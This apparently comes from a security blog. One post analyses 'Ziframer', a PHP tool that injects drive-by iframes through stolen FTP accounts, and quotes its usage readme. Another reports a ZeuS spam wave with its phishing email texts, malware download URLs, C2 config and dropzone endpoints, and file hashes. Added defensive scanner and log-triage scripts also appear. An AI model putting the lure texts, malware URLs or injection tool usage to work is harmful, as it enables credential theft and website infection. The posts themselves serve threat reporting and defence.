Search Results for 'wsnpoem'

An Iframer for Dummies

Today I came across an Iframer called Ziframer. But first of all: What is an Iframer?

An Iframer is a script used to test stolen FTP accounts and inject malicious code into web pages. If an FTP account is valid, the Iframer automatically plants a drive-by infection in the specified html, php or asp files.

In this case the Iframer is a PHP script used to spread a variant of ZeuS (aka Zbot/WSNPoem). The Iframer is called “Ziframer” and is sold for $30. The PHP script can be launched from the command line or accessed using a web browser:

[Screenshot: Ziframer v1.3]

The script is very simple and just needs a list of FTP accounts to check. As you can see in the screenshot above, the input file (ftp.txt) currently contains more than 18’000 stolen FTP credentials:

[Screenshot: stolen FTP credentials]

In the file “iframe.txt” the attacker defines the JavaScript or HTML code he would like to inject:

[Screenshot: malicious iframe]

The cybercriminal can also set a timeout, a file where the script will report invalid FTP credentials (bad.txt) and a file that will collect valid FTP credentials (good.txt). The screenshot below shows the script working through the list of stolen FTP credentials (ftp.txt):

[Screenshot: valid FTP accounts]

Last but not least, the attacker has to define where the malicious code should be placed. He has the following options:

start – Inject the code at the top of the page
end – Inject the code at the bottom of the page
change – Replace a text or a string in the page with the malicious code
check – Check whether the malicious code is already on the page

Now the cybercriminal only has to press the “START” button to run the script. The Iframer script will then work through the FTP accounts and inject the malicious code defined in the file “iframe.txt” (see above).

To make the script more user friendly, it comes with a readme file which describes its usage in Russian and English.

Content of readme.html (english):

This script is designed to test FTP accounts for validity and insert code into files on the FTP.

[Features]
[*] Console and web interface
[*] Runs stably under Windows and *nix / BSD
[*] Checks FTP accounts for validity
[*] Inserts the code (at the beginning or end of the file, or fully overwrites the file with your text – deface)
[*] Comments out other people's iframes
[*] Convenient logs
[*] All accounts (valid \ invalid) remain in the database.
[*] The names of the files to insert the code into can be set as a regExp, such as index\.(.*)[_b] or [_b](.*).php|html|asp|htm.
[*] It walks through all the folders on the site.
[*] The update function replaces your old code with the new one (for example, if the frame addresses changed)

[Run]
[!] It is recommended to use the console interface

Windows
Open a console (Start -> Run -> cmd)
Write the path to php.exe, for example c:\php\php.exe
then write the path to the script (zifr.php)
For example like so: c:\php\php.exe D:\soft\ziframer\zifr.php
the script will run and display a certificate.

*NIX
Open the console / ssh
Write php, then write the path to the script (zifr.php)
For example like so: php /home/user/soft/ziframer/zifr.php
the script will run and display a certificate.

[Options]
-file -f Path to the file with your FTP accounts
-code -c Path to the file with the code to insert
-inject -i Where to insert the code, three options
start – top of the page
end – bottom of the page
change – replace the text in the page with the code
-time -t Timeout for connecting to the FTP
-del -d With this option other people's iframes are commented out
-update -u Update your code; with this option the script searches for the inserted code and replaces it with the new one
-good -g File where working FTP accounts will be stored
-bad -b File where non-working FTP accounts will be stored
-hide -h If you enable this option, your code will not be marked, but you will not be able to use the update function
-restore -r Continue from the last FTP; if you did not have time to do the whole list, you can start from where you stopped
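A defender can look for what the Iframer leaves behind. The following scanner is an added example, not part of the original post or of the Ziframer tool: it walks a web root for the html/php/asp files the tool targets and flags hidden or tiny iframes and external script tags, reporting whether they sit at the start or end of a file (the tool's start/end insertion modes). The heuristics, the allowed-host list and the sample page (hosts under .example) are assumptions made for this example.

```python
import re
from pathlib import Path
WEB_EXTENSIONS = {".html", ".htm", ".php", ".asp"}  # file types the article names

TAG_RE = re.compile(r"<(iframe|script)\b[^>]*>", re.I)
SRC_RE = re.compile(r"\bsrc\s*=\s*[\"']?(?:https?:)?//([^/\"'>\s]+)", re.I)
TINY_RE = re.compile(r"\b(?:width|height)\s*=\s*[\"']?\d{1,2}\b", re.I)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)

def tag_reason(tag, allowed_hosts):
    """Why a tag looks like a drive-by injection, or None if it looks benign."""
    host = SRC_RE.search(tag)
    if host and host.group(1).lower() in allowed_hosts:
        return None  # loads from a host we trust (e.g. our own CDN)
    if tag.lower().startswith("<iframe"):
        if TINY_RE.search(tag) or HIDDEN_RE.search(tag):
            return "hidden or tiny iframe"
        return None
    return "external script" if host else None

def find_injections(text, allowed_hosts=()):
    """Return (line_no, position, reason, tag) for each suspicious iframe/script tag.
    position is 'start', 'end' or 'middle', mirroring the Iframer's insertion modes."""
    allowed = {h.lower() for h in allowed_hosts}
    lines = text.splitlines()
    hits = []
    for i, line in enumerate(lines, 1):
        for m in TAG_RE.finditer(line):
            reason = tag_reason(m.group(0), allowed)
            if reason:
                pos = "start" if i <= 2 else "end" if i >= len(lines) - 1 else "middle"
                hits.append((i, pos, reason, m.group(0)[:80]))
    return hits

def scan_webroot(root, allowed_hosts=()):
    """Walk a web root; map each file that has findings to its list of hits."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in WEB_EXTENSIONS:
            hits = find_injections(path.read_text(errors="replace"), allowed_hosts)
            if hits:
                findings[str(path)] = hits
    return findings

# Constructed sample: a clean shop page with a hidden iframe appended after </html>, as the "end" mode leaves it.
SAMPLE_PAGE = """<html>
<head><title>Shop</title><script src="https://cdn.example/app.js"></script></head>
<body><p>Welcome</p></body>
</html>
<iframe src="http://badsite.example/in.php" width="1" height="1" style="visibility:hidden"></iframe>"""
```

Run `scan_webroot("/var/www", allowed_hosts=("cdn.example",))` against a copy of the site and compare the result with a known-good checkout; a new hit at position "end" in many files at once is the pattern this tool produces.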

Conclusion

The Ziframer script is very simple and cheap. Even a n00b is able to use it.

It also demonstrates how efficiently and easily cybercriminals can distribute their malicious code to tremendous numbers of stolen FTP accounts. Automated mechanisms like this one show how infection vectors are shifting more and more from e-mails with malicious attachments to drive-by downloads. The modular approach allows the cybercriminal to feed the script with different lists of compromised accounts, which can be acquired on the underground market.

WSNPoem: report_8977.exe

Since this afternoon another spam wave has been circulating which spreads the banking trojan ZeuS (aka zbot / wsnpoem):

Subject: Information of your Transactions

Good evening
Dear Credit Card Holder:

The last transaction report on your credit card shows a number of transactions that have questionable background. That gives us reasons to believe that your credit card details have been stolen, and your card has been abused for making unauthorized payments.

Enclosed is the listing of transactions made with your credit card between 13.06.2009 and 15.06.2009. Please look through the enclosed document carefully and pay special attention to the last three of the listed transactions they are the ones that we suspect to be fraudulent.

Please find time to review the enclosed account statement and confirm the transactions you have authorized in person. This would help us both to have this issue resolved as quickly as possible.

The Word-formatted copy of your transaction list:

http://scananida.com.pl/report_8977.exe

The email text and subject always seem to be the same. The sender of the email is forged and varies. Interestingly, this time the trojan does not come in a ZIP file: instead, a link at the end of the email points to a hacked website where the ZeuS binary is hosted:

http://scananida.com.pl/report_8977.exe

;; QUESTION SECTION:
;scananida.com.pl. IN A

;; ANSWER SECTION:
scananida.com.pl. 39283 IN A 91.121.8.196

route: 91.121.0.0/18
descr: OVH ISP
descr: Paris, France
origin: AS16276
mnt-by: OVH-MNT

Extremely alarming is the fact that the binary is currently detected as malware by just two antivirus vendors:

Filename: report_8977.exe
File size: 81920 bytes
MD5 : d4e6069285270e41ef470d897cf26e36
SHA1 : 854bf8ff8933cd30797eb1d2e134a4895f574af6
Detection rate: 2/41 (4.88%)

If the recipient of the email runs the EXE file, ZeuS nests itself in the system and listens for login data for mail, banking and social network accounts. It is notable that this time, too, the stolen data is sent to the command & control server djellow.com that is already known to us (see WSNPoem: client_update.zip / WSNPoem: Spam-Wellen fluten das Netz):

GET http://djellow.com/djwlc/djwl.bin <- ZeuS configuration file
GET http://djellow.com/djwlc/bin.exe <- Latest ZeuS binary
POST http://djellow.com/djwl/rec.php <- Dropzone

The location where the trojan nests itself in the system is also the same again:

C:\WINDOWS\system32\sdra64.exe
C:\WINDOWS\system32\lowsec
C:\WINDOWS\system32\lowsec\user.ds
C:\WINDOWS\system32\lowsec\local.ds
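The C2 exchange above (config download, binary update, POST to the dropzone) gives a defender a simple triage rule for proxy logs. The following is an added example, not part of the original post: it assumes a constructed space-separated access-log format (timestamp, client IP, method, URL, status) and uses only the C2 host, URIs and lure URLs quoted in this post; the sample log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Indicators quoted in the post: the ZeuS C2 host with its three URIs, and the lure URLs.
C2_HOST = "djellow.com"
C2_ROLES = {"/djwlc/djwl.bin": "config download",
            "/djwlc/bin.exe": "binary update",
            "/djwl/rec.php": "dropzone upload"}
LURE_URLS = {"http://scananida.com.pl/report_8977.exe",
             "http://w-crook.com.ar/report_8977.exe"}

# Constructed log format (assumption): "<epoch> <client_ip> <method> <url> <status>"
LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(GET|POST)\s+(\S+)\s+(\d{3})")

def classify(method, url):
    """Map one proxied request to a ZeuS infection stage, or None if unrelated."""
    if url in LURE_URLS:
        return "lure download"  # the user clicked the link in the spam mail
    parts = urlsplit(url)
    if parts.hostname != C2_HOST:
        return None
    # any other path on the C2 host is still worth an alert
    return C2_ROLES.get(parts.path, "other C2 contact")

def triage(log_lines):
    """Return {client_ip: [(timestamp, stage), ...]} for clients touching ZeuS infrastructure."""
    report = defaultdict(list)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line or a different log format
        ts, client, method, url, _status = m.groups()
        stage = classify(method, url)
        if stage:
            report[client].append((ts, stage))
    return dict(report)

def exfiltrating_hosts(log_lines):
    """Clients that reached the dropzone: stolen credentials have already left the network."""
    return sorted(ip for ip, events in triage(log_lines).items()
                  if any(stage == "dropzone upload" for _, stage in events))

# Constructed sample log: one client follows the full chain, another is clean.
SAMPLE_LOG = """\
1245094800 10.0.0.15 GET http://scananida.com.pl/report_8977.exe 200
1245094860 10.0.0.15 GET http://djellow.com/djwlc/djwl.bin 200
1245094870 10.0.0.15 GET http://djellow.com/djwlc/bin.exe 200
1245095000 10.0.0.15 POST http://djellow.com/djwl/rec.php 200
1245095100 10.0.0.22 GET http://www.example.com/index.html 200
""".splitlines()
```

A client that only shows the lure download needs the file-system check above (sdra64.exe, lowsec\) to decide whether the binary actually ran; a client in `exfiltrating_hosts` needs credential resets as well as cleanup.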

Conclusion

  • Temporarily reject emails with the subject Information of your Transactions at the email gateways
  • Block access to djellow.com (91.206.201.6)
  • Since several such ZeuS spam waves have been circulating for a few days now, increased vigilance is advisable when opening emails from unknown or suspicious senders
UPDATE 20:31

Apparently a second ZeuS spam wave is also making the rounds:

Subject: Worldpay CARD transaction Confirmation

Your transaction has been processed by WorldPay, on behalf of Amazon Inc.

http://w-crook.com.ar/report_8977.exe

This is not a tax receipt.
We processed your payment.
Amazon Inc has received your order,
and will inform you about delivery.
Sincerely,
Amazon Team

This confirmation only indicates that your transaction has been processed
successfully.
It does not indicate that your order has been accepted.
It is the responsibility of Amazon Inc to confirm that
your order has been accepted, and to deliver any goods or services you have
ordered.

Text and subject are always the same. The URL advertised in the spam mail is different from the URL in the “Information of your Transactions” spam mail, but the binary offered there is the same:

http://w-crook.com.ar/report_8977.exe

Filename: report_8977.exe
File size: 81920 bytes
MD5 : d4e6069285270e41ef470d897cf26e36
SHA1 : 854bf8ff8933cd30797eb1d2e134a4895f574af6
Detection rate: 2/41 (4.88%)
